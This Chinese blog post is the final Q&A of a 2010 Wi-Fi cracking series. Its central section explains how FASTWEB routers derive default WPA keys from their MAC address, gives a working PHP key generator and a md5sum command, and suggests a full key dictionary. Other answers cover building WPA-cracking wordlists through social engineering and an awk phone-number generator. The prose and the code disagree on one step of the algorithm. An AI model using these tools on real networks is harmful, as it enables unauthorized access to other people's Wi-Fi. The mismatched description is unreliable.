Wireless Series(12): 问与答 (全文完)
版权声明: 允许非商业性转载,但转载时必须标明原作者 fcicq、原始链接 http://www.fcicq.net/wp/?p=879 及本声明。
问: 有没有其他的破解 WPA 的方法?
答: 当然有. 
比如有一种路由器品牌叫 FASTWEB, 这个品牌在意大利比较流行.
有人使用 IDA Pro 调试时找到了其出厂 WPA 密钥生成的算法. Source
假设原 SSID 为 FASTWEB-1-00193EA1B2C3.
将 0×00,0×19,0×3E,0xA1,0xB2,0xC3 与此密钥相连.
0×22,0×33,0×11,0×34,0×02,0×81,0xFA,0×22,0×11,0×41,
0×68,0×11,0×12,0×01,0×05,0×22,0×71,0×42,0×10,0×66
计算 md5 (二进制形式), 每次取 5 bits, 共取 5 次.
每一段的数值如果小于 0xA 就加上 0×57. 变换为 16 进制即为结果.
用命令行计算 md5.
echo -en "\x00\x19\x3E\xA1\xB2\xC3\x22\x33\x11\x34\x02\x81\xFA\x22\x11\x41\x68\x11\x12\x01\x05\x22\x71\x42\x10\x66" |md5sum
php 版, 能够直接输出密钥. SSID 在代码第一行.
< ?php
//By fcicq (http://www.fcicq.net/wp/), Released under GPLv2
$a = sprintf("%c%c%c%c%c%c",0x00,0x19,0x3e,0xa1,0xb2,0xc3);
$b = sprintf("%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c",
0x22,0x33,0x11,0x34,0x02,0x81,0xFA,0x22,0x11,0x41,
0x68,0x11,0x12,0x01,0x05,0x22,0x71,0x42,0x10,0x66);
$md5 = md5($a.$b,true);
//only the first 4 bytes is needed.
sscanf($md5, "%c%c%c%c", $m0, $m1, $m2, $m3 );
$k1 = ((ord($m0) & 0xF8) / 8); //11111000
$k2 = ((ord($m0) & 0x07) * 4) + ((ord($m1) & 0xC0) / 64); //00000111 11000000
$k3 = ((ord($m1) & 0x3E) / 2); //00111110
$k4 = ((ord($m1) & 0x1) * 16) + ((ord($m2) & 0xF0) / 16); //00000001 11110000
$k5 = ((ord($m2) & 0xF) * 2) + ((ord($m3) & 0x80) / 128); //00001111 10000000
if ($k1 >= 0xA) $k1+=0x57;
if ($k2 >= 0xA) $k2+=0x57;
if ($k3 >= 0xA) $k3+=0x57;
if ($k4 >= 0xA) $k4+=0x57;
if ($k5 >= 0xA) $k5+=0x57;
printf("%02x%02x%02x%02x%02x\n", $k1, $k2, $k3, $k4, $k5);
?>
考虑到品牌厂商的 MAC 前缀数量有限, 其 MAC 可能性为 256^3 * MAC 段数.
而密钥可能性为 32^5, 所以密钥的全部组合更适合作为字典使用.
以全部密钥作为字典只需要占用 32^5*(10+1) = 352 M 空间.
但如果不知道密钥范围的话就比较麻烦了. 256^5 = 2^40 给人的感觉就太大了.
看过这个之后, 你是不是想测试一下自己的路由器是否也内置一种默认密码算法?
或许某些人会往这个方向努力的.
—
问: 什么样的字典适合 WPA?
答: 首先要考虑覆盖面大的弱字典. 事实上偶的 unidict-20100410 就是这样考虑的.
其次是社会工程方面, 知道的信息越多越好. 如果这些都弄不出来的话用一些字典生成器也可以, 但希望就不太大了.
问: 方便的手机号生成器?
答: 有个现成的号段表, Download
使用方法:
awk '{j=$1*10000; for(i=0;i<10000;i++) printf("%.f\n",i+j);}' 0397.txt > 0397-mobile.txt
—
问: 一台破解一台连接是否有用?
答: 没有用. 但不可否认的是, IV 确实增加了. 建立连接时得到的数据包不可重发.
对 WPA/WPA2 来说抓到的是错误的握手包, 不会有 Data 产生, 并得到 Deauth Packets.
问: 某些网卡显示频道不对, 133 频道什么的.
答: 既然不是 5 Ghz 的网络那就是 Bug. 参见 Aircrack-ng Ticket #670.
133 频道是正常的 6 频道. 每增加/减少 5 个频道等于正常增减的 1 个频道. 对应表就不列了. 1 频道是 Ch 108, 13 频道是 Ch 168. 不过好像很少见呢.
问: 利用 WPS / QSS 破解 WPA2 的可能性?
答: 已有专文叙述. 流言终结者: WPS, CSRF, 802.11n
—
问: 如何加固无线网络?
答: 换有线网络
WPA2 都不能挡住 -0 这种攻击形式(当然这实际是两回事), 不换有线又能怎么办呢…
可以把整个无线网络全部切换到 802.11n 设备, 并使用 Greenfield mode (此时会失去 802.11b/g 的向后兼容性).
另一个好处是由于制式不同, 传输范围与速率都将增加.
再需要高安全性的就上 VPN 好了, 可是这样也不能解决 -0 这样简单的问题.
问: WAPI 安全性如何?
答: 市面上有 WAPI 路由器卖吗? 既然没卖的那怎么知道?
—
系列全部文章一览:
Wireless Series 预告篇
Wireless Series(1): 驱动与网卡芯片支持列表 (至 2010.4)
Wireless Series(2): 常用软件与工具 (Windows 平台)
Wireless Series(3): 常用软件与工具 (Linux 平台)
Wireless Series(4): 天线, 信号, 距离 (2010.4.30 Updated)
Wireless Series(5): 网卡好坏的判断标准
Wireless Series(6): Aircrack-ng (1), 基础篇
Wireless Series(7): Aircrack-ng (2), Aireplay-ng 模式
Wireless Series(8): Aircrack-ng (3), 总结篇
Wireless Series(9): FeedingBottle
Wireless Series(10): 高级应用 (1)
Wireless Series(11): 高级应用 (2)
Wireless Series(12): 问与答 (全文完)
—
至此整个系列就全部完结了.
这些文章以后如果有机会的话还会做一些补充与更新. 而这是转载者所做不到的.
就是转载也要遵守一些规则, 不要给图片再加一次水印, 保证文章链接的完整性. 这叫守 PageRank 奴?
推荐的转载方式是仅转载预告篇, 并保持链接完整.
对文章的反馈可以扔到留言板上去. 虽说需要审核.
—
这段时间耽误了不少正常文章的发布.
个人大修过的 gappproxy 将于近日放出, 敬请期待.
友情提示: 请注意文章的时效性与准确性, 作者不对文章的有效性负责.
Tags:
Permalink Bookmark on del.icio.us
Last Modified: May 15, 2010 at 5:22 pm